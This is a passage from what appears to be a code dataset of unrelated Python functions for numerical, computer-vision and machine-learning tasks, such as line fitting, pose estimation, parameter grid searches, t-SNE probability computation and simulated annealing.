line: \n lines ,idxs = info_rand_sample_fit_lines(points, numLines)\n \n \n # Compute normal distance of each point from each line: Store in a 2-D numpy array: \n # Points along 1st axis - Rows - axis= 0\n # Lines along 2nd axis - Columns - axis=1\n \n # Initialize the 2-D array: \n normDist = np.zeros((numPoints, numLines))\n \n \n # Indices for the 2-D array: \n j,k = 0,0\n \n # Loop through points:\n for point in points: \n \n k = 0\n \n # Loop through the lines: \n for line in lines:\n \n normDist[j,k] = get_normal_dist(line,point)\n \n # Increment the column (line) index:\n k+=1\n \n \n #Increment the row (point) index\n j += 1\n \n # Transform the Normal Distance matrix to the Probability of Membership matrix: \n Pr_C = log_dec(normDist,e_tilde)\n \n \n ## Iteratively refine estimates of Prob of Validity - Points and Lines: \n iterCount = 0\n \n # Initialize Probability of Validity of points and lines: \n initProb =1\n Pr_A = initProb*np.ones((numPoints,1))\n Pr_V = np.zeros((numLines,1))\n \n \n # Initialize gamma and beta: Fractions of valid points and lines respectively: \n gamma = np.zeros_like(Pr_V)\n beta = np.zeros_like(Pr_A)\n \n \n while iterCount < numIter: \n \n # For each line: \n for k in range(numLines):\n \n # Compute expected fraction of valid points: \n gamma[k] = np.dot(Pr_A.T, Pr_C[:,k])/np.sum(Pr_A)\n \n #print (gamma[k], end=\" ->\")\n \n # Compute Probability of Validity: \n Pr_V = log_inc(gamma, gamma_tilde)\n \n \n \n # For each point: \n for j in range(numPoints):\n \n # Compute expected fraction of valid lines in which it is a member: \n beta[j] = np.dot(Pr_V.T, Pr_C[j,:])/np.sum(Pr_V)\n \n \n #print (beta[j], end=\" ->\")\n \n #print (\" \")\n \n # Compute Probability of Validity: \n Pr_A = log_inc(beta, beta_tilde)\n \n \n iterCount +=1\n \n # Sort the lines according to Probability of Validity:\n idx_sort = np.argsort(Pr_V, axis=0)\n \n print (\" The equations of candidate lines and their probability of validity are: \") \n\n \n for idx in idx_sort: \n print (lines[int(idx)] , end = '-- >')\n print (Pr_V[idx])\n \n return lines, Pr_A, Pr_V", "def main_eaftest(point_ind, permutations=10240, alpha=0.05):\n \n # ------ Attainment indicator values information ------\n \n npoints = len(point_ind)\n nvars = len(point_ind[0]) # Número de execuções total\n nruns = nvars // 2 # Número de execuções de 1 algo\n \n print \"- Attainment indicator values information:\"\n print \" * Number of points:\", npoints\n print \" * Joint executions:\", nvars, \"(%d + %d)\" % (nruns, nruns)\n print\n \n assert nvars % 2 == 0, \"Number of total joint executions must be even.\"\n assert nvars <= 64, \"Not implemented with more than 64 joint executions.\"\n \n # ------ Test Statistic ------\n\n print \"- Computing the test statistic...\" \n stat2 = libaft.ksstat(point_ind, order=2)\n print \" * Test statistic = %d/%d\" % (stat2, nruns)\n print \" = %f\" % (stat2 / float(nruns)), '\\n'\n \n # ------ Estimate null distribution ------\n\n print \"- Using %d random permutations to estimate null distribution.\" % permutations\n print \" Please be patient...\"\n maxdist = np.zeros(permutations, dtype=np.int32) # Max distance array\n rtime = time.time()\n \n masks = bintools.make_masks(permutations, nvars, seed=64)\n for i, maxd in enumerate(KERNEL.runkernel(point_ind, masks)):\n maxdist[i] = maxd\n if (i+1) % (permutations//20) == 0:\n print \" %6d permutations, %7.3f sec\" % (i+1, time.time()-rtime)\n print \" * Time elapsed: %7.3f\" % (time.time()-rtime)\n \n # Compute null distribution from max distance array\n tail = np.bincount(maxdist, minlength=nruns+1)\n print \" * Non-normalized null distribution:\"\n print tail\n print\n \n # ------ Accept/reject null hypothesis ------\n \n # NB: -1 resulta das diferentes convenções para a definição de valor crítico\n crit = criticalvalue(tail, alpha * permutations) - 1\n pval = pvalue(tail, stat2) / float(permutations)\n \n print \"- Null hypothesis decision:\" \n print \" * Critical value = %d/%d\" % (crit, nruns)\n print \" = %f\" % (crit / float(nruns))\n print \" * p-value = %f\" % pval\n if pval <= alpha:\n print \" <= alpha (%s)\\n\" % alpha\n print \" * Decision: REJECT the null hypothesis\"\n else:\n print \" > alpha (%s)\\n\" % alpha\n print \" * Decision: do NOT REJECT the null hypothesis\"\n print", "def do_pnp(pts3d_for_pnp, pts2d_for_pnp, K, iterations=200, reprojThresh=5):\n list_pts3d_for_pnp = pts3d_for_pnp\n list_pts2d_for_pnp = pts2d_for_pnp\n pts3d_for_pnp = np.array(pts3d_for_pnp)\n # pts2d_for_pnp = np.expand_dims(np.squeeze(np.array(pts2d_for_pnp)), axis=1)\n # print(pts3d_for_pnp)\n # print(pts2d_for_pnp.shape)\n num_pts = len(pts3d_for_pnp)\n print(num_pts)\n highest_inliers = 0\n for j in range(iterations):\n pt_idxs = np.random.choice(num_pts, 6, replace=False)\n pts3 = np.array([pts3d_for_pnp[pt_idxs[i]] for i in range(len(pt_idxs))])\n # print(\"pts\",pts3)\n pts2 = np.array([pts2d_for_pnp[pt_idxs[i]] for i in range(len(pt_idxs))])\n _, rvec, tvec = cv2.solvePnP(pts3, pts2, K, distCoeffs=np.array([]), flags=cv2.SOLVEPNP_ITERATIVE)\n R, _ = cv2.Rodrigues(rvec)\n pnp_errors, projpts, avg_err, perc_inliers = test_reproj_pnp_points(list_pts3d_for_pnp, list_pts2d_for_pnp, R, tvec, K, rep_thresh=reprojThresh)\n if highest_inliers < perc_inliers:\n highest_inliers = perc_inliers\n best_R = R\n best_tvec = tvec\n R = best_R\n tvec = best_tvec\n # print('rvec:', rvec,'\\n\\ntvec:', tvec)\n print(\"avg\",avg_err)\n print(\"inlier\",perc_inliers)\n return R, tvec", "def compute_parallel_points(self, sorted_pts, np, display_opt):\n # find lowest point (get point closest to epi_apex_node)\n numPoints = sorted_pts.shape[0]\n ds = np.zeros((numPoints,), dtype=float)\n\n epi_apex_node = np.asarray(self.epi_apex_node)\n\n for i in range(numPoints):\n ds[i] = np.linalg.norm(epi_apex_node - sorted_pts[i])\n\n lowest_point_id = np.argmin(ds)\n\n # create linspace using lowest point id\n num_pts_left = lowest_point_id\n num_pts_right = numPoints - lowest_point_id\n print('num pts left = ', num_pts_left)\n print('num points right = ', num_pts_right)\n\n scale = 0.3 # we only want 30% of points on one side\n max_ls_idx = int(scale * num_pts_left)\n max_rs_idx = int(scale * num_pts_right)\n idxs = np.arange(lowest_point_id-max_ls_idx, lowest_point_id+max_rs_idx, np, dtype=int)\n\n # get points\n parapts = np.zeros((np, 3), dtype=float)\n for i, idx in enumerate(idxs):\n parapts[i] = sorted_pts[idx]\n\n if display_opt:\n parapts_act = include_points(parapts, parapts.shape[0], 7, (0,1,0))\n ren = vtk.vtkRenderer()\n ren.SetBackground(1.0,1.0,1.0)\n ren.AddActor(self.endoActor)\n ren.AddActor(parapts_act)\n vtk_show(ren)\n\n return parapts", "def Checker(a,b,n,x):\n if n==0:\n if abs(a[0]-b[0])>=x: #if the changes in eta from one time step to another is more than .05mm\n return True #return true to continue the loop\n else:\n return False #stop the loop (this only happens if all of the points had a change of less than .05mm)\n elif abs(a[n]-b[n])>=x: #this checks each of the points in the channel \n return True #if any have too big a change the loop continues\n else: #if that point in the channel has small enough change\n Checker(a,b,n-1) #check the next point in the channel", "def isFree(point):\n global grid\n for i in point:\n if i < 0:\n return False\n try:\n value = grid[point[0]][point[1]][point[2]]\n # print value\n except:\n print \"point \", point, \"lies outside of grid\"\n value = False\n\n return value", "def check_box(volume,point,is_queued_map,is_visited_map):\n list_not_visited=[]\n list_not_queued = []\n list_are_near = []\n\n if point[0]==1227 and point[1]==735 and point[2]==27:\n pass\n\n\n for x in xrange(-1, 2):\n\n # Edgecase for x\n if point[0] + x < 0 or point[0] + x > volume.shape[0] - 1:\n continue\n\n for y in xrange(-1, 2):\n\n # Edgecase for y\n if point[1] + y < 0 or point[1] + y > volume.shape[1] - 1:\n continue\n\n for z in xrange(-1, 2):\n\n # Edgecase for z\n if point[2] + z < 0 or point[2] + z > volume.shape[2] - 1:\n continue\n\n # Dont look at the middle point\n if x == 0 and y == 0 and z == 0:\n continue\n\n # TODO case if loop, all are queued but not visited\n if volume[point[0] + x, point[1] + y, point[2] + z] == 1:\n\n\n list_are_near.extend([[point[0] + x, point[1] + y, point[2] + z]])\n\n if is_queued_map[point[0] + x, point[1] + y, point[2] + z]==0:\n list_not_queued.extend([[point[0] + x, point[1] + y, point[2] + z]])\n if is_visited_map[point[0] + x, point[1] + y, point[2] + z]==0:\n list_not_visited.extend([[point[0] + x, point[1] + y, point[2] + z]])\n\n is_visited_map[point[0],point[1],point[2]]=1\n return list_not_queued,list_not_visited,is_visited_map,list_are_near", "def iterate(self):\n ret = super(ExpandableAlgorithm, self).pre_iteration()\n if ret is None:\n return None\n active, passive, neighbors, features_active, features_passive = ret\n params = [features_active, features_passive]\n if self._post_args:\n params += self._post_args\n s = self._overlap_function(*params)\n if self.condition_axelrod:\n if self.__condition_axelrod(s, features_active, features_passive):\n return True\n if self.condition_centola:\n if self.__condition_centola(s, active, passive, neighbors):\n return True", "def _check_parameters(self, p, integral=False, name=None, sym=None):\n for h in range(self._.d + 1):\n for i in range(self._.d + 1):\n for j in range(self._.d + 1):\n p[h, i, j] = ASParameters. \\\n _check_parameter(h, i, j, p[h, i, j],\n integral=integral,\n name=name, sym=sym)", "def check_data_validity(X, y, query, task):\n # ADD IMPLEMENTATION HERE", "def check_assignment(assignments: dict, point: Point, value: str) -> bool:\n\n # check base condition: do the constraints hold for current point\n if not check_constraint_satisfied(assignments, point, value):\n print(' → base constraint failed:', point, '=', value)\n return False\n\n # check neighbouring conditions: do the constraints (still) hold for other points\n temp_assignment = copy.deepcopy(assignments)\n temp_assignment[point] = value\n\n # loop through points that can attack the current point, as kings\n print(' > checking neighbouring kings')\n for pt in filter(lambda p: p in assignments and assignments[p] == 'king', attack_points_king[point]):\n if not check_constraint_satisfied(temp_assignment, pt, assignments[pt]):\n print(' → neighbouring constraint failed for neighbour', pt, '=', assignments[pt])\n return False\n\n # loop through points that can attack the current point, as knights\n print(' > checking neighbouring knights')\n for pt in filter(lambda p: p in assignments and assignments[p] == 'knight', attack_points_knight[point]):\n if not check_constraint_satisfied(temp_assignment, pt, assignments[pt]):\n print(' → neighbouring constraint failed for neighbour', pt, '=', assignments[pt])\n return False\n\n # all constraints are satisfied!\n return True", "def semi_plan_check(coords_list, normal_plane, point_on_plane, tol=1e-8):\n center_to_coords = coords_list - \\\n np.repeat(point_on_plane.reshape((-1,3)), len(coords_list), axis=0)\n normal_plane = \\\n np.repeat(normal_plane.reshape((-1,3)), len(coords_list), axis=0)\n inner_product = np.sum(center_to_coords*normal_plane,axis=1)\n flag = np.zeros(inner_product.shape, dtype=bool)\n flag[inner_product >= 0] = True\n return flag", "def sanity_check():\n print(\"Running sanity check...\")\n\n N = 20\n dimensions = [10, 5, 10]\n data = np.random.randn(N, dimensions[0]) # each row will be a datum\n labels = np.zeros((N, dimensions[2]))\n for i in range(N):\n labels[i,random.randint(0,dimensions[2]-1)] = 1\n \n params = np.random.randn((dimensions[0] + 1) * dimensions[1] + (\n dimensions[1] + 1) * dimensions[2], )\n\n gradcheck_naive(lambda params: forward_backward_prop(data, labels, params,\n dimensions), params)", "def para_search(dname):\n if sys.platform != 'win32':\n grid_py = './PromoterSVM/libsvm/tools/grid.py'\n # gnuplot_exe = '/usr/bin/gnuplot'\n # svmtrain_exe = '../my-svm-train'\n else:\n grid_py = r'D:\\LiYuan\\\"Bioinformatic Research\"\\IMU\\zuo\\Tasks\\\"20160206-Promoter SVM\"\\biopromoter_script\\PromoterSVM\\libsvm\\tools\\grid.py'\n # gnuplot_exe = r\"D:\\Program Files\\gnuplot\\bin\\gnuplot.exe\"\n # svmtrain_exe = r'D:\\LiYuan\\\"Bioinformatic Research\"\\IMU\\zuo\\Tasks\\\"20160206-Promoter SVM\"\\biopromoter_script\\PromoterSVM\\libsvm\\windows\\my-svm-train.exe'\n\n ###################################\n # grid.py: find the best parameter(c,g), and generates a model file\n ###################################\n # cg_results = []\n cmd = \"{0} {1}\".format(grid_py, dname)\n print \"Cross Validating...\"\n grid_out = Popen(cmd, shell=True, stdout=PIPE).stdout\n\n print cmd\n print grid_out.readline()\n\n line = \"\"\n while True:\n last_line = line\n line = grid_out.readline()\n if not line:\n break\n c, g, cvrate = map(float, last_line.split())\n # cg_results.append('Best c={0}, g={1} CV rate={2}'.format(c,g,rate))\n\n print('Best c={0}, g={1} CV rate={2}'.format(c, g, cvrate))\n\n return c, g, cvrate", "def points_in_boxes_gpu(points, boxes):\n assert boxes.shape[0] == points.shape[0]\n assert boxes.shape[2] == 7\n batch_size, num_points, _ = points.shape\n\n box_idxs_of_pts = points.new_zeros((batch_size, num_points),\n dtype=torch.int).fill_(-1)\n roiaware_pool3d_ext.points_in_boxes_gpu(boxes.contiguous(),\n points.contiguous(),\n box_idxs_of_pts)\n\n return box_idxs_of_pts", "def check(self):\r\n self.check_probabilities()\r\n self.check_sum()", "def run(self):\n\t\tcurX = self.x0\n\t\tcurY = self.func.evalAt(curX)\n\t\tcurT = self.T0\n\t\tfor i in range(1, self.iters + 1):\n\t\t\tif curT == 0:\n\t\t\t\tbreak\n\t\t\tnX = self.newStateFunc(curX)\n\t\t\tnY = self.func.evalAt(nX)\n\t\t\tif nY <= curY or self.acceptanceFunc(nY - curY, curT) > random.random(): # accept if lower energy or probability check passes\n\t\t\t\tcurX = nX\n\t\t\t\tcurY = nY \n\t\t\tcurT = self.coolingFunc(self.T0, i)\t\n\t\treturn (curX, curY)", "def isparallel(p1, p2, tol=10*_eps):\n \n return np.linalg.norm(np.cross(p1.w, p2.w) ) < tol", "def cloudranger_param_search(ela, alpha, entry_point, true_root_cause, data_inwindow, data_head,\n dep_graph, window_start):\n result_list = []\n for beta in np.arange(0.1, 1.0, 0.2):\n for rho in np.arange(0.1, 1.0, 0.2):\n tic = time.time()\n prks, acc = test_cloud_ranger(\n data_source=\"ibm_micro_service\",\n pc_aggregate=ela,\n pc_alpha=alpha,\n testrun_round=5,\n beta=beta,\n rho=rho,\n frontend=entry_point,\n true_root_cause=true_root_cause,\n verbose=0,\n runtime_debug=False,\n data=data_inwindow,\n data_head=data_head,\n disable_print=True,\n dep_graph=dep_graph,\n window_start=window_start\n )\n toc = time.time()-tic\n result_list.append({\n 'ela': ela,\n 'beta': beta,\n 'rho': rho,\n 'time': toc,\n 'prks': prks,\n 'acc': acc\n })\n print(\"Cloudranger ela:{:d} beta:{:.2f} rho:{:.2f} time:{:.4f} acc:{:.4f}\".format(\n ela, beta, rho, toc, acc))\n return result_list", "def runIteration(self, task, Sol, Fitness, xb, fxb, A, S, Q, v, **dparams):\n\t\tfor i in range(self.NP):\n\t\t\tQ[i] = self.Qmin + (self.Qmax - self.Qmin) * self.uniform(0, 1)\n\t\t\tv[i] += (Sol[i] - xb) * Q[i]\n\t\t\tif self.rand() > self.r: S[i] = self.localSearch(best=xb, A=A[i], task=task, i=i, Sol=Sol)\n\t\t\telse: S[i] = task.repair(Sol[i] + v[i], rnd=self.Rand)\n\t\t\tFnew = task.eval(S[i])\n\t\t\tif (Fnew <= Fitness[i]) and (self.rand() < A[i]): Sol[i], Fitness[i] = S[i], Fnew\n\t\t\tif Fnew <= fxb: xb, fxb, A[i] = S[i].copy(), Fnew, self.updateLoudness(A[i])\n\t\treturn Sol, Fitness, xb, fxb, {'A': A, 'S': S, 'Q': Q, 'v': v}", "def sanity_check():\n print \"Running sanity check...\"\n\n N = 20\n dimensions = [10, 5, 10]\n data = np.random.randn(N, dimensions[0]) # each row will be a datum\n labels = np.zeros((N, dimensions[2]))\n for i in xrange(N):\n labels[i,random.randint(0,dimensions[2]-1)] = 1\n \n params = np.random.randn((dimensions[0] + 1) * dimensions[1] + (\n dimensions[1] + 1) * dimensions[2], )\n\n gradcheck_naive(lambda params: forward_backward_prop(data, labels, params,\n dimensions), params)", "def _evaluate_centroids(self):\n\n for c in self.centroids:\n _prev_cent = self._prev_centroids[c]\n _curr_cent = self.centroids[c]\n\n if self._euclidean_distance(_prev_cent, _curr_cent) > self.tol:\n return\n self._optimized = True", "def point_valid(self, pt, samples):\n\n\t cell_coords = self.get_cell_coords(pt)\n\t for idx in self.get_neighbours(cell_coords):\n\t nearby_pt = samples[idx]\n\t # Squared distance between or candidate point, pt, and this nearby_pt.\n\t distance2 = (nearby_pt[0]-pt[0])**2 + (nearby_pt[1]-pt[1])**2\n\t if distance2 < (self.r)**2:\n\t # The points are too close, so pt is not a candidate.\n\t return False\n\t # All points tested: if we're here, pt is valid\n\t return True", "def points_in_boxes_cpu(points, boxes):\n # TODO: Refactor this function as a CPU version of points_in_boxes_gpu\n assert boxes.shape[1] == 7\n assert points.shape[1] == 3\n\n point_indices = points.new_zeros((boxes.shape[0], points.shape[0]),\n dtype=torch.int)\n roiaware_pool3d_ext.points_in_boxes_cpu(boxes.float().contiguous(),\n points.float().contiguous(),\n point_indices)\n\n return point_indices", "def sanity_check():\n print \"Running sanity check...\"\n\n N = 20\n dimensions = [10, 5, 10]\n data = np.random.randn(N, dimensions[0]) # each row will be a datum\n labels = np.zeros((N, dimensions[2]))\n for i in xrange(N):\n labels[i, random.randint(0,dimensions[2]-1)] = 1\n\n params = np.random.randn((dimensions[0] + 1) * dimensions[1] + (\n dimensions[1] + 1) * dimensions[2], )\n\n forward_backward_prop(data, labels, params, dimensions)\n\n gradcheck_naive(lambda params:\n forward_backward_prop(data, labels, params, dimensions), params)", "def learn_params(self, measurements, true_ranges):\n z_hit,z_short,z_max,z_rand,var_hit,lambda_short= self.params\n pre_params=[z_hit,z_short,z_max,z_rand,var_hit,lambda_short]\n updated_params=[-1,-1,-1,-1,-1,-1]\n while np.max(np.abs(np.array(updated_params) - np.array(pre_params))) > 1e-6:\n\n e_hit, e_short, e_max, e_rand = [], [], [], []\n for i in range(len(measurements)):\n true_range, measurement = true_ranges[i], measurements[i]\n p_hit = self.PHit(true_range, measurement,var_hit)\n p_short = self.PShort(true_range, measurement,lambda_short)\n p_max = self.PMax(measurement)\n p_rand = self.PRand(measurement)\n normalizer = 1.0 / (p_hit + p_short + p_max + p_rand)\n e_hit.append(normalizer * p_hit)\n e_short.append(normalizer * p_short)\n e_max.append(normalizer * p_max)\n e_rand.append(normalizer * p_rand)\n e_hit, e_short, e_max, e_rand = np.array(e_hit), np.array(e_short), np.array(e_max), np.array(e_rand)\n\n # perform M step\n pre_params = [z_hit, z_short, z_max, z_rand, var_hit,lambda_short]\n z_hit = sum(e_hit) / len(measurements)\n z_short = sum(e_short) / len(measurements)\n z_max = sum(e_max)/ len(measurements)\n z_rand = sum(e_rand) / len(measurements)\n var_hit = np.sqrt(1.0 / np.sum(e_hit) * np.sum(e_hit * (np.array(measurements)-np.array(true_ranges))**2)).item()\n lambda_short = (np.sum(e_short) / np.sum(e_short * np.array(measurements))).item()\n updated_params = [z_hit, z_short, z_max, z_rand, var_hit, lambda_short]\n print('origin',self.params)\n print('updated',updated_params)\n return updated_params", "def checkLists(self):\n self.x = self.checkList(self.x)\n self.y = self.checkList(self.y)\n return", "def check_consistent_params(self, X, y):\n y = self.check_consistent_y(y)\n X = self.check_consistent_X(X)\n\n return X, y", "def x2p(X = Math.array([]), tol = 1e-5, perplexity = 30.0):\n\n # Initialize some variables\n print \"Computing pairwise distances...\"\n (n, d) = X.shape;\n sum_X = Math.sum(Math.square(X), 1);\n D = Math.add(Math.add(-2 * Math.dot(X, X.T), sum_X).T, sum_X);\n P = Math.zeros((n, n));\n beta = Math.ones((n, 1));\n logU = Math.log(perplexity);\n\n # Loop over all datapoints\n for i in range(n):\n \n # Print progress\n if i % 500 == 0:\n print \"Computing P-values for point \", i, \" of \", n, \"...\"\n \n # Compute the Gaussian kernel and entropy for the current precision\n betamin = -Math.inf; \n betamax = Math.inf;\n Di = D[i, Math.concatenate((Math.r_[0:i], Math.r_[i+1:n]))];\n (H, thisP) = Hbeta(Di, beta[i]);\n \n # Evaluate whether the perplexity is within tolerance\n Hdiff = H - logU;\n tries = 0;\n while Math.abs(Hdiff) > tol and tries < 50:\n \n # If not, increase or decrease precision\n if Hdiff > 0:\n betamin = beta[i];\n if betamax == Math.inf or betamax == -Math.inf:\n beta[i] = beta[i] * 2;\n else:\n beta[i] = (beta[i] + betamax) / 2;\n else:\n betamax = beta[i];\n if betamin == Math.inf or betamin == -Math.inf:\n beta[i] = beta[i] / 2;\n else:\n beta[i] = (beta[i] + betamin) / 2;\n \n # Recompute the values\n (H, thisP) = Hbeta(Di, beta[i]);\n Hdiff = H - logU;\n tries = tries + 1;\n \n # Set the final row of P\n P[i, Math.concatenate((Math.r_[0:i], Math.r_[i+1:n]))] = thisP;\n \n # Return final P-matrix\n print \"Mean value of sigma: \", Math.mean(Math.sqrt(1 / beta))\n return P;", "def _compute_parameters(self, p, k):\n for i in range(self._.d + 1):\n p[0, i, i] = k[i]\n p[i, 0, i] = Integer(1)\n p[i, i, 0] = Integer(1)\n for i in range(self._.d):\n p[i+1, 1, i+1] = self._.a[i+1]\n p[i, 1, i+1] = self._.b[i]\n p[i+1, 1, i] = self._.c[i+1]\n for i in range(2, self._.d + 1):\n for j in range(1, self._.d + 1):\n for h in range(1, self._.d):\n p[h, i, j] = self._check_parameter(\n h, i, j,\n _simplify(_expand((\n self._.c[h] * p[h-1, i-1, j]\n + self._.b[h] * p[h+1, i-1, j]\n - self._.b[i-2] * p[h, i-2, j]\n + (self._.a[h] - self._.a[i-1]) * p[h, i-1, j]\n ) / self._.c[i])))\n p[self._.d, i, j] = self._check_parameter(\n self._.d, i, j,\n _simplify(_expand((\n self._.c[self._.d] * p[self._.d-1, i-1, j]\n - self._.b[i-2] * p[self._.d, i-2, j]\n + (self._.a[self._.d] - self._.a[i-1])\n * p[self._.d, i-1, j]\n ) / self._.c[i])))", "def __evaluateLocal__(self,featureVals):\n returnEvaluation = {self.pivotParameterID:self.pivotValues}\n for target in list(set(self.target) - set([self.pivotParameterID])):\n reconstructData = self._reconstructData(target).real\n # find the nearest data and compute weights\n if len(reconstructData) > 1:\n weights, indexes = self.KDTreeFinder.query(featureVals, k=min(2**len(self.features),len(reconstructData)))\n # if 0 (perfect match), assign minimum possible distance\n weights[weights == 0] = sys.float_info.min\n weights =1./weights\n # normalize to 1\n weights = weights/weights.sum()\n for point in range(len(weights)):\n returnEvaluation[target] = np.sum ((weights[point,:]*reconstructData[indexes[point,:]].T) , axis=1)\n else:\n returnEvaluation[target] = reconstructData[0]\n\n return returnEvaluation", "def get_triple_point_distances(self) -> Dict[str, List[Any]]:\n relevant_distances = {}\n for read_meth in self.readout_methods:\n f_params = self.fit_parameters[read_meth]\n binary_neighborhood = f_params[\"binary_neighborhood\"]\n noise_level = f_params[\"noise_level\"]\n distance_threshold = f_params[\"distance_threshold\"]\n\n data = self.filtered_data[read_meth]\n signal = data.values.T\n v_x = data[default_coord_names[\"voltage\"][0]].values\n v_y = data[default_coord_names[\"voltage\"][1]].values\n\n neighborhood = generate_binary_structure(2, binary_neighborhood)\n m_filter = maximum_filter(signal, footprint=neighborhood)\n detected_peaks = m_filter == signal\n\n background = signal <= noise_level\n eroded_background = binary_erosion(\n background, structure=neighborhood, border_value=1\n )\n\n detected_peaks[eroded_background == True] = False\n\n labeled_features = scm.label(detected_peaks)\n labels = labeled_features[0]\n n_features = labeled_features[1]\n if np.sum(n_features) > 1:\n coordinates = []\n\n for peak_id in range(1, n_features + 1):\n indx = np.argwhere(labels == peak_id)[0]\n if len(indx) == 0:\n logger.error(\"No peak found.\")\n\n if (\n indx[1] > 0\n and indx[1] < len(v_x) - 2\n and indx[0] > 0\n and indx[0] < len(v_y) - 2\n ):\n x_val = v_x[indx[1]]\n y_val = v_y[indx[0]]\n coordinates.append([x_val, y_val])\n coordinates = np.array(coordinates)\n\n # calculate distances between points, all to all\n all_combos = combinations(coordinates, 2)\n distances = [get_point_distances(*combo) for combo in all_combos]\n distances_arr = np.asarray(distances)\n relevant_indx = np.where(distances_arr[:, 0, 0] <= distance_threshold)[\n 0\n ]\n\n dist_list = [distances[indx] for indx in relevant_indx]\n relevant_distances[read_meth] = dist_list\n else:\n relevant_distances[read_meth] = []\n return relevant_distances", "def testPointSystem():\n deleteMatches()\n deletePlayers()\n registerPlayer(\"Pikachu\")\n registerPlayer(\"Charmander\")\n registerPlayer(\"Bulbasaur\")\n registerPlayer(\"Squirtle\")\n registerPlayer(\"MewTwo\")\n standings = playerStandings()\n [id1, id2, id3, id4, id5] = [row[0] for row in standings]\n reportMatch(id1, id2)\n reportMatch(id3, id4, True)\n reportMatch(id5, id5, False, True)\n reportMatch(id1, id5)\n reportMatch(id3, id4)\n reportMatch(id2, id2, False, True)\n reportMatch(id1, id3)\n reportMatch(id5, id2)\n reportMatch(id4, id4, False, True)\n standings = playerStandings()\n if not (standings[0][0]==id2 and standings[0][2]==2 and\n standings[1][0]==id4 and standings[0][2]==2 and\n standings[2][0]==id3 and standings[0][2]==2 and\n standings[3][0]==id5 and standings[0][2]==2 and\n standings[4][0]==id1 and standings[0][2]==2):\n raise ValueError(\n \"Points are not tallied correctly.\"\n )\n\n print \"4. Points are tallied correctly.\"", "def perform_parameter_checks(self, update=False):\n for p, check_function in self.parameter_checks.items():\n try:\n val = p.snapshot(update=update)['value']\n res = check_function(val)\n if res != True: # False or a string (error message)\n log.warning(\n f'Parameter {p.full_name} has an uncommon value: '\n f'{val}.' + (f\" ({res})\" if res is not False else ''))\n except Exception as e:\n log.warning(\n f'Could not run parameter check for {p}: {e}')", "def gridSearch(xTrain, yTrain, xTest, yTest, model, modelParameters, hyperParameters, \n nFolds = 1, reTrain = True, plotGraphs = False):\n leastLoss = None\n bestModel = None\n bestHyperParams = None\n \n \"\"\"Generate the parameter grid\"\"\"\n parameterGrid = []\n gridKeys = []\n \n parameterGrid = list(product(*hyperParameters.values()))\n hyperParameterKeys = hyperParameters.keys()\n \n \"\"\"For plottong graphs\"\"\"\n if plotGraphs:\n plt.close()\n plotHeight = 10\n plotWidth = 20\n index = 0\n fig, axs = plt.subplots(len(parameterGrid), 2, figsize=(plotWidth, plotHeight * len(parameterGrid)))\n fig = plt.figure()\n fig.set_figheight(15)\n fig.set_figwidth(15)\n ax = fig.add_subplot(111, projection='3d')\n \n\n \"\"\"Grid search for cartesian product of hyperParameters\"\"\" \n for parameterMesh in parameterGrid:\n hyperParameterMesh = {}\n for k,v in zip(hyperParameterKeys, parameterMesh):\n hyperParameterMesh[k] = v\n \n \"\"\"Combine model Parameters\"\"\"\n updatedParam = modelParameters.copy()\n updatedParam.update(hyperParameterMesh)\n \n \"\"\"Perform grid search with cross validation\"\"\"\n if nFolds > 1:\n modelParams, trainLossList, testLossList, analysisMetricList = kFoldAnalysis(model = model,\n xTrain = xTrain,\n yTrain = yTrain,\n nFolds = nFolds,\n modelParameters = updatedParam) \n \n \n \"\"\"For storing best model\"\"\"\n avg = np.average(analysisMetricList)\n if leastLoss == None or avg < leastLoss:\n leastLoss = avg\n bestModel = modelParams\n bestHyperParams = hyperParameterMesh\n \n \"\"\"For plotting\"\"\"\n if plotGraphs:\n foldIndex = 1\n\n ax.scatter(hyperParameterMesh['alpha'], hyperParameterMesh['regularizationParameter'], \n avg, marker = 'o', label = str(hyperParameterMesh))\n \n\n for train, test in zip(trainLossList, testLossList):\n axs[index][0].plot(train, label = \"Fold-\" + str(foldIndex))\n axs[index][1].plot(test, label = \"Fold-\" + str(foldIndex))\n foldIndex = foldIndex + 1\n \n axs[index][0].legend()\n axs[index][0].grid()\n \n axs[index][1].legend()\n axs[index][1].grid()\n \n axs[index][0].set_title(\"Train set for \" + str(hyperParameterMesh))\n axs[index][1].set_title(\"Validation set for \" + str(hyperParameterMesh))\n \n index = index + 1\n \n \n \"\"\"Perform only grid search and no cross validation. Test set will be used for validation\"\"\" \n else:\n trainedModel, trainLoss, testLoss = model(xTrain, yTrain, xTest, yTest, **updatedParam)\n \n \"\"\"For storing best model\"\"\"\n if leastLoss == None or testLoss[-1] < leastLoss:\n leastLoss = testLoss[-1]\n bestModel = trainedModel\n bestHyperParams = hyperParameterMesh\n \n \"\"\"For plotting graphs\"\"\"\n if plotGraphs:\n axs[index][0].plot(trainLoss, label = \"Training set Loss for \" + str(hyperParameterMesh))\n axs[index][0].legend()\n axs[index][0].grid()\n axs[index][1].plot(testLoss, label = \"Test set Loss for \" + str(hyperParameterMesh))\n axs[index][1].legend()\n axs[index][1].grid()\n index = index + 1\n \n if plotGraphs:\n ax.legend()\n ax.set_xlabel('alpha')\n ax.set_ylabel('regularizationParameter')\n ax.set_zlabel('RMSE')\n\n plt.show()\n plt.close()\n \n if reTrain:\n \n \"\"\"Combine model Parameters\"\"\"\n updatedParam = modelParameters.copy()\n updatedParam.update(bestHyperParams)\n\n bestModel, trainLoss, testLoss = model(xTrain, yTrain, xTest, yTest, **updatedParam)\n print trainLoss[-1]\n print testLoss[-1]\n \n if plotGraphs:\n plt.close()\n plotHeight = 10\n plotWidth = 20\n fig, axs = plt.subplots(1, 2, figsize = (plotWidth, plotHeight)) \n \n plt.suptitle(\"Best model\")\n\n axs[0].plot(trainLoss, label = \"Training set Loss for \" + str(bestHyperParams))\n axs[0].legend()\n axs[0].grid()\n axs[1].plot(testLoss, label = \"Test set Loss for \" + str(bestHyperParams))\n axs[1].legend()\n axs[1].grid()\n \n plt.show()\n \n \n \n return bestModel, bestHyperParams", "def gridsearch_LCPS(y, w, splits_list, grid=None, t=1):\n # repeat loop for every parameter in grid\n average_mae_per_par = dict()\n for parameter in grid:\n\n mae_list = []\n\n # for loop for each set of indices per fold\n for index_dict in splits_list:\n # perform rolling predictions using train set on the validation set\n y_pred = rolling_pred_LCPS(LCPSModel,\n y[index_dict[\"train\"][0]:\n index_dict[\"train\"][1]],\n y[index_dict[\"validation\"][0]:\n index_dict[\"validation\"][1]],\n w[index_dict[\"train\"][0]:\n index_dict[\"train\"][1]],\n w[index_dict[\"validation\"][0]:\n 